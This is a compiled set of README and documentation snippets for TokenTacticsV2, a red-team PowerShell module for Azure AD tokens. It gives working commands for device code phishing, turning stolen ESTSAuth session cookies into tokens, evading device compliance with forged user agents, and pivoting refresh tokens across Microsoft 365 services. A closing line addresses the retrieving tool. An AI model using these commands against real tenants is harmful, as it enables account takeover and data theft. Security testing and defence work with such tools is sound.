### Install and Use TokenTacticsV2 PowerShell Module Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Demonstrates how to import the TokenTactics module and access its help documentation. This is the initial step for using any of the module's cmdlets. ```powershell Import-Module .\TokenTactics.psd1 Get-Help Get-AzureToken ``` -------------------------------- ### Using Tokens with AADInternals Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Illustrates the use of obtained tokens with the AADInternals tool for testing and analysis. This example shows setting a status message using a Teams token. ```powershell # Use with AADInternals Invoke-RefreshToMSTeamsToken -Domain "contoso.com" -UseCAE Set-AADIntTeamsStatusMessage -Message "Testing CAE tokens" -AccessToken $MSTeamsToken.access_token ``` -------------------------------- ### Use Tokens with AAD Internals Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Shows how to generate a Microsoft Teams token using CAE and then use that access token to set a status message via the AADInternals module. This requires both TokenTacticsV2 and AADInternals to be installed. ```powershell Invoke-RefreshToMSTeamsToken -UseCAE -Domain "myclient.org" Set-AADIntTeamsStatusMessage -Message "My cool status message" -AccessToken $MSTeamsToken.access_token -Verbose ``` -------------------------------- ### REST API Calls with Bearer Token Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Provides an example of making REST API calls to Microsoft Graph using an authorization header with a Bearer token. This is a common method for interacting with Graph API endpoints. ```powershell # Use tokens with REST API calls $headers = @{ "Authorization" = "Bearer $($MSGraphToken.access_token)" "Content-Type" = "application/json" } Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me" -Headers $headers -Method Get ``` -------------------------------- ### Get Azure Access Token using Device Code Flow (DODMSGraph) Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Retrieves an Azure access token specifically for the DODMSGraph client via the Device Code flow. This is a specialized endpoint for Department of Defense related Microsoft Graph access. ```powershell Get-AzureToken -Client DODMSGraph ``` -------------------------------- ### Get Azure Access Token using Device Code Flow (MSGraph) Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Obtains an Azure access token for the MSGraph client using the Device Code authentication flow. The response contains both the access token and a refresh token, with the latter being crucial for continuous token renewal. ```powershell Get-AzureToken -Client MSGraph ``` -------------------------------- ### Get Azure Token from ESTSAuth Cookie Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Acquires an access and refresh token by leveraging an ESTSAuth or ESTSAuthPersistent cookie. This method is useful when a session cookie has been obtained through means like phishing or other session hijacking techniques. ```powershell Get-AzureTokenFromESTSCookie -ESTSAuthCookie "0.AbcApTk..." ``` -------------------------------- ### List TokenTactics Commands Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Displays all available commands within the TokenTactics PowerShell module. This helps users discover the full range of functionalities provided by the module. ```powershell Get-Command -Module TokenTactics ``` -------------------------------- ### DOD/GCC High Environment Authentication Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Acquires tokens for DOD/GCC High Azure environments using `Get-AzureToken` with the `-Client DODMSGraph` parameter, facilitating access to these specific government cloud instances. ```powershell # DOD/GCC High environment authentication Get-AzureToken -Client DODMSGraph ``` -------------------------------- ### Connect to AzureAD using Access Token Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Establishes a connection to Azure Active Directory using an provided access token. This allows subsequent cmdlets to operate within the context of the authenticated user or service principal. ```powershell Connect-AzureAD -AadAccessToken $response.access_token -AccountId user@myclient.org ``` -------------------------------- ### Invoke Refresh to Substrate Token Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Initiates the process of refreshing a token for the 'Substrate' service, likely related to Microsoft 365 backend services. Requires a domain parameter to specify the target tenant. ```powershell Invoke-RefreshToSubstrateToken -Domain "myclient.org" ``` -------------------------------- ### PowerShell: Authorization Code Flow with TokenTactics Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Generates authorization URLs and exchanges authorization codes for tokens using TokenTactics, useful for bypassing device compliance requirements. It supports custom redirect URIs, username hints, and PKCE (Proof Key for Code Exchange) for enhanced security. The process involves generating a URL, user authentication, and then exchanging the obtained code for tokens. ```powershell # Generate authorization URL with Android Intune Company Portal redirect Get-AzureAuthorizationCode -Client MSGraph -RedirectUrl "msauth://com.microsoft.windowsintune.companyportal/1L4Z9FJCgn5c0VLhyAxC5O9LdlE=" -Username "user@contoso.com" -CopyToClipboard # Output: # https://login.microsoftonline.com/organizations/oauth2/v2.0/authorize?response_type=code&client_id=9ba1a5c7-f17a-4de9-a1f1-6178c8d51223&scope=https://graph.microsoft.com/.default%20offline_access%20openid&redirect_uri=msauth://com.microsoft.windowsintune.companyportal/1L4Z9FJCgn5c0VLhyAxC5O9LdlE=&state=9gaPNizkzgtisKqA&login_hint=user@contoso.com # After user authenticates and gets redirected, extract code and exchange it Get-AzureTokenFromAuthorizationCode -Client MSGraph -AuthorizationCode "1.AXkAT2xo4yev..." -RedirectUrl "msauth://com.microsoft.windowsintune.companyportal/1L4Z9FJCgn5c0VLhyAxC5O9LdlE=" # Alternative: Pass full redirect URL Get-AzureTokenFromAuthorizationCode -RequestURL "msauth://com.microsoft.windowsintune.companyportal/1L4Z9FJCgn5c0VLhyAxC5O9LdlE=?code=1.AXkAT2xo4yev...&state=9gaPNizkzgtisKqA" # Use PKCE for enhanced security Get-AzureAuthorizationCode -Client MSGraph -UseCodeVerifier # Token acquired and saved as $response ``` -------------------------------- ### User Agent Spoofing with Get-ForgedUserAgent Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Generates custom user agents to simulate different devices and browsers for conditional access policy testing. The `Get-ForgedUserAgent` cmdlet allows specifying device and browser types. ```powershell # Generate default user agent (Windows Edge) $ua = Get-ForgedUserAgent # Generate Mac Chrome user agent $ua = Get-ForgedUserAgent -Device Mac -Browser Chrome # Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 # Generate Android mobile user agent $ua = Get-ForgedUserAgent -Device AndroidMobile -Browser Chrome # Generate iPhone Safari user agent $ua = Get-ForgedUserAgent -Device iPhone -Browser Safari # Custom user agent string Get-AzureToken -Client MSGraph -CustomUserAgent "MyCustomApp/1.0" ``` -------------------------------- ### Connect to Microsoft Graph PowerShell Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Shows how to connect to the Microsoft Graph PowerShell module using an acquired access token. This enables programmatic access to Microsoft Graph data and services. ```powershell # Connect to Microsoft Graph PowerShell Invoke-RefreshToMSGraphToken -Domain "contoso.com" Connect-MgGraph -AccessToken $MSGraphToken.access_token ``` -------------------------------- ### Device Code Authentication Flow Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Initiates OAuth2 device code flow to obtain initial access and refresh tokens by presenting a code for user authentication. ```APIDOC ## Device Code Authentication Flow ### Description Initiates OAuth2 device code flow to obtain initial access and refresh tokens by presenting a code for user authentication. ### Method GET ### Endpoint N/A (PowerShell Cmdlet) ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body None ### Request Example ```powershell # Basic MSGraph authentication with device code Import-Module .\TokenTactics.psd1 Get-AzureToken -Client MSGraph # Authenticate with custom client ID and scope Get-AzureToken -Client Custom -ClientID "d3590ed6-52b3-4102-aeff-aad2292ab01c" -Scope "https://graph.microsoft.com/.default offline_access openid" # Use specific device/browser combination to bypass device compliance policies Get-AzureToken -Client MSGraph -Device iPhone -Browser Safari # Enable Continuous Access Evaluation for 24-hour tokens Get-AzureToken -Client MSGraph -UseCAE ``` ### Response #### Success Response (200) - **access_token** (string) - The access token obtained. - **refresh_token** (string) - The refresh token obtained. #### Response Example ```json { "access_token": "eyJ0eXAiOiJKV1QiLCJub...", "refresh_token": "0.AXkAT2xo4yev..." } ``` ``` -------------------------------- ### Connect to MSGraph using Access Token Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Establishes a connection to Microsoft Graph using a provided access token. Requires the access token obtained from a previous authentication step. Defines scopes for the Graph API access. ```powershell Invoke-RefreshToMSGraphToken -Domain "myclient.org" Connect-MgGraph -AccessToken $MSGraphToken.access_token -Scopes "User.Read.All","Group.ReadWrite.All" ``` -------------------------------- ### PowerShell: Device Code Authentication Flow with TokenTactics Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Initiates OAuth2 device code flow using TokenTactics to obtain initial access and refresh tokens for Microsoft services. It supports basic MSGraph authentication, custom client IDs, scopes, specific device/browser combinations, and Continuous Access Evaluation (CAE) for 24-hour tokens. The output displays authentication codes and URIs, and the resulting tokens are saved to a response object. ```powershell # Basic MSGraph authentication with device code Import-Module .\TokenTactics.psd1 Get-AzureToken -Client MSGraph # Output will display: # user_code: ABC123DEF # device_code: BAQABAAEAAA... # verification_uri: https://microsoft.com/devicelogin # message: To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code ABC123DEF # After user authenticates, token is saved to $response $response.access_token # eyJ0eXAiOiJKV1QiLCJub... $response.refresh_token # 0.AXkAT2xo4yev... # Authenticate with custom client ID and scope Get-AzureToken -Client Custom -ClientID "d3590ed6-52b3-4102-aeff-aad2292ab01c" -Scope "https://graph.microsoft.com/.default offline_access openid" # Use specific device/browser combination to bypass device compliance policies Get-AzureToken -Client MSGraph -Device iPhone -Browser Safari # Enable Continuous Access Evaluation for 24-hour tokens Get-AzureToken -Client MSGraph -UseCAE ``` -------------------------------- ### Connect to AzureAD with Graph Token Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Demonstrates how to connect to the AzureAD PowerShell module using a Graph API access token. This allows managing Azure AD resources through PowerShell. ```powershell # Connect to AzureAD module Invoke-RefreshToGraphToken -Domain "contoso.com" Connect-AzureAD -AadAccessToken $GraphToken.access_token -AccountId "user@contoso.com" ``` -------------------------------- ### Token Refresh Operations Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Exchange refresh tokens for access tokens to different Microsoft services, leveraging FOCI capabilities. ```APIDOC ## Token Refresh Operations ### Description Exchange refresh tokens for access tokens to different Microsoft services, leveraging FOCI capabilities. ### Method POST ### Endpoint N/A (PowerShell Cmdlet) ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body None ### Request Example ```powershell # Refresh to Microsoft Graph token (defaults to $response.refresh_token) Invoke-RefreshToMSGraphToken -Domain "contoso.com" # Use specific refresh token Invoke-RefreshToMSGraphToken -Domain "contoso.com" -RefreshToken "0.AXkAT2xo4yev..." # Refresh to Outlook token with CAE support Invoke-RefreshToOutlookToken -Domain "contoso.com" -UseCAE ``` ### Response #### Success Response (200) - **access_token** (string) - The refreshed access token. #### Response Example ```json { "access_token": "eyJ0eXAiOiJKV1QiLCJ..." } ``` ``` -------------------------------- ### Continuous Access Evaluation (CAE) with MSGraph Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Demonstrates how to use Continuous Access Evaluation (CAE) with MSGraph to obtain tokens that can be evaluated for continuous access. It also shows how to parse a JWT token to check if it's CAE capable and its validity period. ```powershell Invoke-RefreshToMSGraphToken -Domain "myclient.org" -UseCAE if ((Parse-JWTtoken $MSGraphToken.access_token).ValidForHours -gt 23) { "MSGraph token is CAE capable" } ``` -------------------------------- ### Generate URL for Authorization Code Flow Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Creates a URL that initiates the OAuth 2.0 Authorization Code flow. This URL is used by a user to authenticate and grant permissions, leading to the issuance of an authorization code. ```powershell Get-AzureAuthorizationCode ``` -------------------------------- ### JWT Token Parsing with ConvertFrom-JWTtoken Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Decodes and analyzes JWT tokens to extract claims, expiration, and validity information using the `ConvertFrom-JWTtoken` cmdlet. It allows accessing properties like UPN, audience, issuer, and expiration date. ```powershell # Parse access token $tokenInfo = ConvertFrom-JWTtoken -Token $response.access_token # Access token properties $tokenInfo.upn # user@contoso.com $tokenInfo.aud # https://graph.microsoft.com $tokenInfo.appid # d3590ed6-52b3-4102-aeff-aad2292ab01c $tokenInfo.iss # https://sts.windows.net/abc123.../ $tokenInfo.IssuedAt # 10/13/2025 14:30:22 $tokenInfo.ExpirationDate # 10/13/2025 15:30:22 $tokenInfo.ValidForHours # 1.0 # Check if token is CAE-capable (24-hour validity) $tokenInfo = ConvertFrom-JWTtoken -Token $MSGraphToken.access_token if ($tokenInfo.ValidForHours -gt 23) { Write-Host "Token is CAE-capable with extended lifetime" } # Parse via pipeline $response.access_token | ConvertFrom-JWTtoken | Select-Object upn, aud, ExpirationDate ``` -------------------------------- ### SharePoint-Specific Device Code Authentication Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Configures device code authentication specifically for SharePoint, including options for admin consent. This allows targeted authentication flows for SharePoint. ```powershell # SharePoint-specific device code authentication Get-AzureToken -Client SharePoint -SharePointTenantName "contoso" -SharePointUseAdmin ``` -------------------------------- ### Token Management with Clear-Token Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Manages stored tokens by clearing them from global variables to maintain session hygiene. The `Clear-Token` cmdlet supports clearing all tokens or specific ones. ```powershell # Clear all tokens Clear-Token -Token All # Clear specific token Clear-Token -Token MSGraph Clear-Token -Token Outlook Clear-Token -Token Response # Clear and re-authenticate Clear-Token -Token All Get-AzureToken -Client MSGraph ``` -------------------------------- ### Device Code Phishing for Specific Resource Tenant Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Performs device code phishing for a specific resource tenant, useful in B2B scenarios. It uses `Get-AzureToken` with the `-ResourceTenant` parameter. ```powershell # Device code phishing for specific resource tenant (B2B scenario) Get-AzureToken -Client MSGraph -ResourceTenant "targetdomain.com" ``` -------------------------------- ### Tenant ID Discovery with Get-TenantID Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Retrieves the Azure AD tenant ID from a given domain name using the `Get-TenantID` cmdlet. This is useful for targeting authentication to specific Azure tenants. ```powershell # Get tenant ID from domain $tenantId = Get-TenantID -Domain "contoso.com" # Output: abc12345-1234-5678-9012-abc123456789 # Use in authentication workflows $tid = Get-TenantID -Domain "microsoft.com" Write-Host "Tenant ID for microsoft.com: $tid" ``` -------------------------------- ### Low-Level Token Refresh Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Performs a low-level token refresh using custom parameters, including refresh token, client ID, and scope. This provides granular control over token acquisition for specific applications. ```powershell # Low-level refresh with custom parameters Invoke-RefreshToToken -Domain "contoso.com" -RefreshToken "0.AXkAT2xo4yev..." -ClientID "d3590ed6-52b3-4102-aeff-aad2292ab01c" -Scope "https://graph.microsoft.com/.default offline_access openid" ``` -------------------------------- ### Authorization Code Flow Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Generates authorization URLs and exchanges authorization codes for tokens, useful for bypassing device compliance requirements. ```APIDOC ## Authorization Code Flow ### Description Generates authorization URLs and exchanges authorization codes for tokens, useful for bypassing device compliance requirements. ### Method GET ### Endpoint N/A (PowerShell Cmdlet) ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body None ### Request Example ```powershell # Generate authorization URL with Android Intune Company Portal redirect Get-AzureAuthorizationCode -Client MSGraph -RedirectUrl "msauth://com.microsoft.windowsintune.companyportal/1L4Z9FJCgn5c0VLhyAxC5O9LdlE=" -Username "user@contoso.com" -CopyToClipboard # After user authenticates and gets redirected, extract code and exchange it Get-AzureTokenFromAuthorizationCode -Client MSGraph -AuthorizationCode "1.AXkAT2xo4yev..." -RedirectUrl "msauth://com.microsoft.windowsintune.companyportal/1L4Z9FJCgn5c0VLhyAxC5O9LdlE=" # Alternative: Pass full redirect URL Get-AzureTokenFromAuthorizationCode -RequestURL "msauth://com.microsoft.windowsintune.companyportal/1L4Z9FJCgn5c0VLhyAxC5O9LdlE=?code=1.AXkAT2xo4yev...&state=9gaPNizkzgtisKqA" # Use PKCE for enhanced security Get-AzureAuthorizationCode -Client MSGraph -UseCodeVerifier ``` ### Response #### Success Response (200) - **access_token** (string) - The access token obtained. - **refresh_token** (string) - The refresh token obtained. #### Response Example ```json { "access_token": "eyJ0eXAiOiJKV1QiLCJ...", "refresh_token": "0.AXkAT2xo4yev..." } ``` ``` -------------------------------- ### Device Code with Custom Scope Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Acquires tokens for a custom client ID with specified scopes, enabling fine-grained permissions for applications. This is useful for scenarios requiring specific API access. ```powershell # Device code with custom scope Get-AzureToken -Client Custom -ClientID "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223" -Scope "User.Read Mail.ReadWrite Calendars.ReadWrite offline_access" ``` -------------------------------- ### Refresh SharePoint Token Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Obtains a refreshed token for SharePoint, enabling access to SharePoint resources. The function requires the domain name as input. ```powershell # Refresh to SharePoint token Invoke-RefreshToSharePointToken -Domain "contoso.com" ``` -------------------------------- ### Refresh OneDrive Token Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Retrieves a refreshed token for OneDrive, facilitating interaction with OneDrive files and services. The domain name is a required parameter. ```powershell # Refresh to OneDrive token Invoke-RefreshToOneDriveToken -Domain "contoso.com" ``` -------------------------------- ### Exchange Authorization Code for Tokens Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Exchanges an authorization code obtained from the Authorization Code flow for an access token and a refresh token. This can be done using the full URL or by providing the authorization code and redirect URL separately. ```powershell Get-AzureTokenFromAuthorizationCode -FullUrl "https://login.microsoftonline.com/..." ``` ```powershell Get-AzureTokenFromAuthorizationCode -AuthorizationCode "AUTHORIZATION_CODE" -RedirectUrl "REDIRECT_URL" ``` -------------------------------- ### Refresh Microsoft Teams Token Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Refreshes the Microsoft Teams token, allowing access to Teams functionalities. It supports specifying the device and browser for the request. ```powershell # Refresh to Microsoft Teams token Invoke-RefreshToMSTeamsToken -Domain "contoso.com" -Device Mac -Browser Safari ``` -------------------------------- ### Cookie-Based Authentication Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Authenticates using ESTS cookies obtained from phishing or session hijacking to acquire tokens without credentials. ```APIDOC ## Cookie-Based Authentication ### Description Authenticates using ESTS cookies obtained from phishing or session hijacking to acquire tokens without credentials. ### Method GET ### Endpoint N/A (PowerShell Cmdlet) ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body None ### Request Example ```powershell # Authenticate with ESTSAuth cookie (standard session) Get-AzureTokenFromESTSCookie -ESTSAuthCookie "0.AbcApTk..." -Client MSTeams # Use ESTSAuthPersistent cookie (longer session) Get-AzureTokenFromESTSCookie -ESTSAuthPersistent "0.AbcApTk..." -Client MSGraph -Device Windows -Browser Edge # Specify custom client and resource Get-AzureTokenFromESTSCookie -ESTSAuthCookie "0.AbcApTk..." -ClientID "d3590ed6-52b3-4102-aeff-aad2292ab01c" -Resource "https://outlook.office365.com" -Scope "openid offline_access" # Handle AADSTS50199 CmsiInterrupt (user confirmation required) # The cmdlet automatically handles appverify endpoint confirmation ``` ### Response #### Success Response (200) - **access_token** (string) - The access token obtained. - **refresh_token** (string) - The refresh token obtained. #### Response Example ```json { "access_token": "eyJ0eXAiOiJKV1QiLCJ...", "refresh_token": "0.AXkAT2xo4yev..." } ``` ``` -------------------------------- ### Refresh Azure Management Token Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Refreshes the Azure Core Management token for a specified domain. This function is essential for obtaining valid credentials to interact with Azure management APIs. ```powershell # Refresh to Azure Management token Invoke-RefreshToAzureCoreManagementToken -Domain "contoso.com" ``` -------------------------------- ### PowerShell: Token Refresh Operations with TokenTactics Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Exchanges existing refresh tokens for new access tokens to different Microsoft services, leveraging the Family of Client IDs (FOCI) capabilities. This allows security testers to pivot to other services using previously acquired tokens. It supports refreshing to Microsoft Graph and Outlook tokens, with options for specifying a particular refresh token and enabling Continuous Access Evaluation (CAE). ```powershell # Refresh to Microsoft Graph token (defaults to $response.refresh_token) Invoke-RefreshToMSGraphToken -Domain "contoso.com" # ✓ Token acquired and saved as $MSGraphToken # Use specific refresh token Invoke-RefreshToMSGraphToken -Domain "contoso.com" -RefreshToken "0.AXkAT2xo4yev..." # Refresh to Outlook token with CAE support Invoke-RefreshToOutlookToken -Domain "contoso.com" -UseCAE $OutlookToken.access_token ``` -------------------------------- ### PowerShell: Cookie-Based Authentication with TokenTactics Source: https://context7.com/f-bader/tokentacticsv2/llms.txt Authenticates using ESTS cookies (standard or persistent) obtained through phishing or session hijacking to acquire Azure AD tokens without needing credentials. This method supports various Microsoft services (e.g., MSTeams, MSGraph, Outlook) and allows specifying custom clients, resources, and scopes. It also includes automatic handling for AADSTS50199 CmsiInterrupt errors requiring user confirmation. ```powershell # Authenticate with ESTSAuth cookie (standard session) Get-AzureTokenFromESTSCookie -ESTSAuthCookie "0.AbcApTk..." -Client MSTeams # Use ESTSAuthPersistent cookie (longer session) Get-AzureTokenFromESTSCookie -ESTSAuthPersistent "0.AbcApTk..." -Client MSGraph -Device Windows -Browser Edge # Specify custom client and resource Get-AzureTokenFromESTSCookie -ESTSAuthCookie "0.AbcApTk..." -ClientID "d3590ed6-52b3-4102-aeff-aad2292ab01c" -Resource "https://outlook.office365.com" -Scope "openid offline_access" # Handle AADSTS50199 CmsiInterrupt (user confirmation required) # The cmdlet automatically handles appverify endpoint confirmation ``` -------------------------------- ### Refresh Outlook Access Token Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Renews an Outlook access token using a refresh token. If no refresh token is explicitly provided, the cmdlet defaults to using the refresh token stored in the `$response.refresh_token` variable. ```powershell Invoke-RefreshToOutlookToken -domain "myclient.org" $OutlookToken.access_token ``` -------------------------------- ### Clear Tokens Source: https://github.com/f-bader/tokentacticsv2/blob/main/README.md Removes all stored token variables from the current session. This is useful for cleaning up session data or for security reasons. ```powershell Clear-Token -Token All ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.